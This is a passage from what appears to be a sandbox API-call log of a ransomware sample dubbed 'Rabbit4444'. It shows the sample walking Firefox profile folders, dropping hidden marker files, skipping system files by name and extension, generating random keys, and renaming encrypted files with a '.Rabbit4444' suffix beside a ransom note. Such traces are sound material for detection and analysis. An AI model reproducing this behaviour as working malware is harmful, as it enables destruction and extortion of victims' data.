lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\WINNT_x86_64-msvc", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\WINNT_x86_64-msvc") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\WINNT_x86_64-msvc" [0052.148] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xef950 | out: hHeap=0xe0000) returned 1 [0052.148] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xea708 | out: hHeap=0xe0000) returned 1 [0052.148] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\WINNT_x86_64-msvc" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\WINNT_x86_64-msvc") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\WINNT_x86_64-msvc" [0052.148] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\WINNT_x86_64-msvc", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\WINNT_x86_64-msvc\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\WINNT_x86_64-msvc\\" [0052.148] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\WINNT_x86_64-msvc\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\WINNT_x86_64-msvc\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\WINNT_x86_64-msvc\\.BFC0E91B00AE8A0620D3" [0052.148] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\WINNT_x86_64-msvc\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp\\winnt_x86_64-msvc\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.149] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.151] FlushFileBuffers (hFile=0x27c) returned 1 [0052.152] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\WINNT_x86_64-msvc\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.152] CloseHandle (hObject=0x27c) returned 1 [0052.153] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\WINNT_x86_64-msvc") returned 95 [0052.153] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.153] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\WINNT_x86_64-msvc\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4079e226, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x4079e226, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0xe867d67d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0052.153] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.153] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.153] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.153] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.153] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4079e226, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x4079e226, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0xe867d67d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.153] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.153] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.153] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.153] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.153] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.153] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe867d67d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe867d67d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe867d67d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.153] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.153] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.153] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe867d67d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe867d67d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe867d67d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0052.154] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0052.154] lstrcpyW (in: lpString1=0x130ebf8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0052.154] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\gmp\\WINNT_x86_64-msvc\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\gmp\\winnt_x86_64-msvc\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0052.154] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0052.154] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0052.155] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.155] CloseHandle (hObject=0x278) returned 1 [0052.155] CloseHandle (hObject=0x27c) returned 1 [0052.155] GetCurrentThreadId () returned 0xd98 [0052.155] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6410 [0052.155] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting" [0052.155] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103f58 | out: hHeap=0xe0000) returned 1 [0052.155] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6408 | out: hHeap=0xe0000) returned 1 [0052.155] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting" [0052.155] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\" [0052.155] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\.BFC0E91B00AE8A0620D3" [0052.155] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0052.158] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0052.160] FlushFileBuffers (hFile=0x27c) returned 1 [0052.161] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0052.161] CloseHandle (hObject=0x27c) returned 1 [0052.164] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting") returned 87 [0052.164] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0052.164] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x145d99f2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0xb844f993, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xe86a3803, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102950 [0052.164] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.164] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.164] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0052.164] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0052.164] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x145d99f2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0xb844f993, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xe86a3803, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.164] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.164] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0052.164] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0052.164] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0052.164] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0052.164] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe86a3803, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe86a3803, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe86a3803, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0052.164] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.164] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0052.164] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x147168f2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x14717c78, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x14717c78, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="archived", cAlternateFileName="")) returned 1 [0052.164] lstrcmpiW (lpString1="archived", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0052.164] lstrcmpiW (lpString1="archived", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.164] lstrcmpiW (lpString1="archived", lpString2="Rabbit4444.exe") returned -1 [0052.164] lstrcmpiW (lpString1="archived", lpString2=".") returned 1 [0052.164] lstrcmpiW (lpString1="archived", lpString2="..") returned 1 [0052.164] lstrcmpiW (lpString1="archived", lpString2="windows") returned -1 [0052.165] lstrcmpiW (lpString1="archived", lpString2="bootmgr") returned -1 [0052.165] lstrcmpiW (lpString1="archived", lpString2="pagefile.sys") returned -1 [0052.165] lstrcmpiW (lpString1="archived", lpString2="boot") returned -1 [0052.165] lstrcmpiW (lpString1="archived", lpString2="ids.txt") returned -1 [0052.165] lstrcmpiW (lpString1="archived", lpString2="NTUSER.DAT") returned -1 [0052.165] lstrcpyW (in: lpString1=0x130ebe8, lpString2="archived" | out: lpString1="archived") returned="archived" [0052.165] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xea708 [0052.165] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc2) returned 0x116380 [0052.165] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xea710 | out: ListHead=0xf68b0, ListEntry=0xea710) returned 0xf6550 [0052.165] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d5bba89, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0x2d5bba89, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0x2d5bba89, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xa1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="session-state.json", cAlternateFileName="SESSIO~1.JSO")) returned 1 [0052.165] lstrcmpiW (lpString1="session-state.json", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.165] lstrcmpiW (lpString1="session-state.json", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.165] lstrcmpiW (lpString1="session-state.json", lpString2="Rabbit4444.exe") returned 1 [0052.165] lstrcmpiW (lpString1="session-state.json", lpString2=".") returned 1 [0052.165] lstrcmpiW (lpString1="session-state.json", lpString2="..") returned 1 [0052.165] lstrcmpiW (lpString1="session-state.json", lpString2="windows") returned -1 [0052.165] lstrcmpiW (lpString1="session-state.json", lpString2="bootmgr") returned 1 [0052.165] lstrcmpiW (lpString1="session-state.json", lpString2="pagefile.sys") returned 1 [0052.165] lstrcmpiW (lpString1="session-state.json", lpString2="boot") returned 1 [0052.165] lstrcmpiW (lpString1="session-state.json", lpString2="ids.txt") returned 1 [0052.165] lstrcmpiW (lpString1="session-state.json", lpString2="NTUSER.DAT") returned 1 [0052.165] lstrcpyW (in: lpString1=0x130ebe8, lpString2="session-state.json" | out: lpString1="session-state.json") returned="session-state.json" [0052.165] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\session-state.json", dwFileAttributes=0x0) returned 1 [0052.166] lstrlenW (lpString="session-state.json") returned 18 [0052.166] lstrlenW (lpString="Rabbit4444") returned 10 [0052.166] lstrcmpiW (lpString1="state.json", lpString2="Rabbit4444") returned 1 [0052.166] lstrlenW (lpString=".dll") returned 4 [0052.166] lstrcmpiW (lpString1="json", lpString2=".dll") returned 1 [0052.166] lstrlenW (lpString=".lnk") returned 4 [0052.166] lstrcmpiW (lpString1="json", lpString2=".lnk") returned 1 [0052.166] lstrlenW (lpString=".ini") returned 4 [0052.166] lstrcmpiW (lpString1="json", lpString2=".ini") returned 1 [0052.166] lstrlenW (lpString=".sys") returned 4 [0052.166] lstrcmpiW (lpString1="json", lpString2=".sys") returned 1 [0052.166] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\session-state.json" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\session-state.json"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0052.166] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0052.166] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14347711309) returned 1 [0052.166] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=161) returned 1 [0052.166] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117608 [0052.167] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0052.167] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3b0, lpName=0x0) returned 0x298 [0052.168] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3b0) returned 0x70000 [0052.169] CryptAcquireContextW (in: phProv=0x130bbd0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x130bbd0*=0x1018d0) returned 1 [0052.170] CryptGenRandom (in: hProv=0x1018d0, dwLen=0x80, pbBuffer=0x130bbec | out: pbBuffer=0x130bbec) returned 1 [0052.170] CryptReleaseContext (hProv=0x1018d0, dwFlags=0x0) returned 1 [0052.170] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0052.170] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0052.170] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0052.170] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0052.170] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0052.170] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0052.170] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0052.170] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0052.170] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14348108978) returned 1 [0052.170] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117608 | out: hHeap=0xe0000) returned 1 [0052.170] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0052.170] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0052.171] CloseHandle (hObject=0x298) returned 1 [0052.171] CloseHandle (hObject=0x278) returned 1 [0052.171] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\session-state.json.Rabbit4444") returned 117 [0052.171] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\session-state.json" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\session-state.json"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\session-state.json.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\session-state.json.rabbit4444"), dwFlags=0x1) returned 1 [0052.171] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x145d99f2, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x145d99f2, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x145d99f2, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x33, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="state.json", cAlternateFileName="STATE~1.JSO")) returned 1 [0052.172] lstrcmpiW (lpString1="state.json", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0052.172] lstrcmpiW (lpString1="state.json", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0052.172] lstrcmpiW (lpString1="state.json", lpString2="Rabbit4444.exe") returned 1 [0052.172] lstrcmpiW (lpString1="state.json", lpString2=".") returned 1 [0052.172] lstrcmpiW (lpString1="state.json", lpString2="..") returned 1 [0052.172] lstrcmpiW (lpString1="state.json", lpString2="windows") returned -1 [0052.172] lstrcmpiW (lpString1="state.json", lpString2="bootmgr") returned 1 [0052.172] lstrcmpiW (lpString1="state.json", lpString2="pagefile.sys") returned 1 [0052.172] lstrcmpiW (lpString1="state.json", lpString2="boot") returned 1 [0052.172] lstrcmpiW (lpString1="state.json", lpString2="ids.txt") returned 1 [0052.172] lstrcmpiW (lpString1="state.json", lpString2="NTUSER.DAT") returned 1 [0052.172] lstrcpyW (in: lpString1=0x130ebe8, lpString2="state.json" | out: lpString1="state.json") returned="state.json" [0052.172] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\state.json", dwFileAttributes=0x0) returned 1 [0052.173] lstrlenW (lpString="state.json") returned 10 [0052.173] lstrlenW (lpString="Rabbit4444") returned 10 [0052.173] lstrcmpiW (lpString1="state.json", lpString2="Rabbit4444") returned 1 [0052.173] lstrlenW (lpString=".dll") returned 4 [0052.173] lstrcmpiW (lpString1="json", lpString2=".dll") returned 1 [0052.173] lstrlenW (lpString=".lnk") returned 4 [0052.173] lstrcmpiW (lpString1="json", lpString2=".lnk") returned 1 [0052.173] lstrlenW (lpString=".ini") returned 4 [0052.173] lstrcmpiW (lpString1="json", lpString2=".ini") returned 1 [0052.173] lstrlenW (lpString=".sys") returned 4 [0052.173] lstrcmpiW (lpString1="json", lpString2=".sys") returned 1 [0052.173] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\datareporting\\state.json" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\datareporting\\state.json"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0052.173] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0052.173] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14348389782) returned 1 [0052.173] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=51) returned 1 [0052.173] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0052.173] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101f30 [0052.173] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x340, lpName=0x0) returned 0x298 [0052.175] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x340) returned 0x70000 [0052.178] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0052.178] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0052.178] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0052.178] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0052.178] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0052.178] HeapFree (in: 